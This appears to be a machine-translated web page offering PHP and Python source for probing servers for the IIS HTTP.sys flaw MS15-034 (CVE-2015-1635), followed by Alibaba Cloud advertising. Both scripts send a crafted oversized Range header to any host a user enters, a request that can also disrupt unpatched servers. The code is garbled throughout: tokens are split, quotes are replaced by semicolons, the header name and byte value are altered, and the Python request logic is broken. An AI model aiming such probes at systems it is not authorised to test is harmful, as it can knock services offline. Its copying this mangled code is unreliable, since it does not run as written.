IIS latest high risk vulnerability (CVE-2015-1635, MS15-034) POC and Online Detection source code
HTTP. sys Remote Code Execution Vulnerability (CVE-2015-1635, MS15-034)
The remote code execution vulnerability exists in the HTTP protocol stack (HTTP. sys). This vulnerability occurs when HTTP. sys does not correctly analyze specially designed HTTP requests. Attackers who successfully exploit this vulnerability can execute arbitrary code in the context of the system account. Https://technet.microsoft.com/zh-cn/library/security/MS15-034
Online Detection source code
Php
Class VulnStatus {const FAIL = 0; const VULN = 1; const VULN_NOT_MS = 2; const PATCHED = 3; const NOT_VULN = 4; const NOT_VULN_MS = 5; const Limit = 6; public static function AsString ($ status, $ host) {switch ($ status) {case self: FAIL: return '; unable to connect ';. $ host. '; test the vulnerability. '; Case self: VULN: return';. $ host. '; the vulnerability exists. '; Case self: VULN_NOT_MS: return';. $ host. '; the vulnerability may exist, but it does not seem to use IIS. '; Case self: PATCHED: return';. $ host. '; fixed. '; Case self: NOT_VULN: return'; the patch status cannot be identified ';. $ host.';. IIS is not used and the vulnerability may not exist. '; Case self: NOT_VULN_MS: return'; the patch status cannot be identified ';. $ host.';. The vulnerability may not exist. '; Case self: NOT_VULN_CF: return';. $ host. '; CloudFlare CDN acceleration may be used, leading to vulnerability detection or non-existent. ';} Return'; seems to be broken '; ;}$ host = false; $ status = false; $ url = filter_input (INPUT_GET,'; host';, FILTER_SANITIZE_URL ); if (! Empty ($ url) & parse_url ($ url, PHP_URL_SCHEME) === null) {$ url = '; http ://';. $ url;} $ port = parse_url ($ url, PHP_URL_PORT); if ($ port = null) {$ port = 80 ;}$ url = parse_url ($ url, PHP_URL_HOST); if ($ url! = Null) {$ cachekey = '; ms15034 _';. $ url. ';_';. $ port; $ cachetime = 300; // 5 minutes $ host = htmlspecialchars ($ url, ENT_HTML5); if ($ port! = 80) {$ host. = ';:';. $ port;} $ memcached = new Memcached (); $ memcached-> addServer (';/var/run/memcached. sock ';, 0); $ status = $ memcached-> get ($ cachekey); if ($ status = false) {$ fp = @ fsockopen ($ url, $ port, $ errno, $ errstr, 5); if ($ fp = false) {$ status = VulnStatus: FAIL;} else {stream_set_timeout ($ fp, 5); $ header = "GET/HTTP/1.1 \ r \ n"; $ header. = "Host: stuff \ r \ n"; $ header. = "Rang E: bytes = 0-18446731673709551615 \ r \ n "; $ header. = "Connection: close \ r \ n"; fwrite ($ fp, $ header); $ response = fread ($ fp, 1024 ); fclose ($ fp); if (strpos ($ response, '; your request range does not match ';)! = False) {$ status = strpos ($ response, '; Microsoft';) = false? VulnStatus: VULN_NOT_MS: VulnStatus: VULN;} else if (strpos ($ response, '; Request an invalid header ';)! = False) {$ cachetime = 3600; // cache time $ status = VulnStatus: PATCHED;} else if (strpos ($ response, '; Microsoft ';) === false) {if (strpos ($ response, '; 403 Forbidden ';)! = False & strpos ($ response, '; cloudflare-nginx ';)! = False) {$ status = VulnStatus: NOT_VULN_CF;} else {$ status = VulnStatus: NOT_VULN ;}} else {$ status = VulnStatus: NOT_VULN_MS ;}} unset ($ fp, $ header, $ response); $ memcached-> set ($ cachekey, $ status, $ cachetime);} $ status = VulnStatus: AsString ($ status, $ host) ;}?> Charset = "UTF-8"> name = "theme-color" content = "#424242"> http-equiv = "X-UA-Compatible" content = "IE = edge, chrome = 1 "> name =" viewport "content =" width = device-width, initial-scale = 1.0 "> MS15-034 test href =" // maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css "rel =" stylesheet "> type =" text/css ">. container {max-width: 900px ;}. masthead {position: relative; padding: 20px 0; text-align: center; color: # fff; background-color: #424242; margin-bottom: 20px ;}. masthead a {color: # fff ;}. footer {text-align: center; padding: 15px; color: #555 ;}. footer span {color: # FA5994 ;}. form-inline {text-align: center; margin-bottom: 20px ;}. github {position: absolute; top: 0; right: 0 ;}
HTTP. sys Stack Vulnerability Test
Enter a URL or host name to test the server's href = "https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target = "_ blank"> MS15-034/href = "http://www.cve.mitre.org/cgi-bin/cvename.cgi? Name = CVE-2015-1635 "target =" _ blank "> CVE-2015-1635.
Id = "js-form" method = "GET"> php if ($ host! = False) {echo '; value = "';. $ host. ';"' ;;}?>> Type = "submit" class = "btn-primary btn-lg"> detect php if ($ status! ==False) {echo $ status ;}?>
#! /Usr/bin/env python _ author _ = '; jastra'; class bg_colors: VULN = '; 33 [92m'; NONVULN ='; 33 [95m '; EXPLOIT = '; 33 [91m'; try: import requests import retries t ImportError as ierr: print (bg_colors.EXPLOIT + "Error, looks like you don'; t have % s installed ", ierr) def identify_iis (domain): req = requests. get (str (domain) remote_server = req. headers ['; Server';] if "Microsoft-IIS" in remote_server: print (bg _ Colors. VULN + "[+] service is" + remote_server) ms15_034_test (str (domain) else: print (bg_colors.NONVULN + "[-] Not IIS \ n may be:" + remote_server) def ms15_034_test (domain): print ("START vuln check! ") Vuln_buffer =" GET/HTTP/1.1 \ r \ nHost: stuff \ r \ nRange: bytes = 0-18446731673709551615 \ r \ n "; req = requests. get (str (domain), params = vuln_buffer) if req. headers ['; content';] = "the request range does not match": print (bg_colors.EXPLOIT + "[+] vulnerability") else: print (bg_colors.EXPLOIT + "[-] IIS service cannot show whether the vulnerability exists. "+" manual detection required ") usr_domain = raw_input (" input domain name scan: ") identify_iis (usr_domain)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
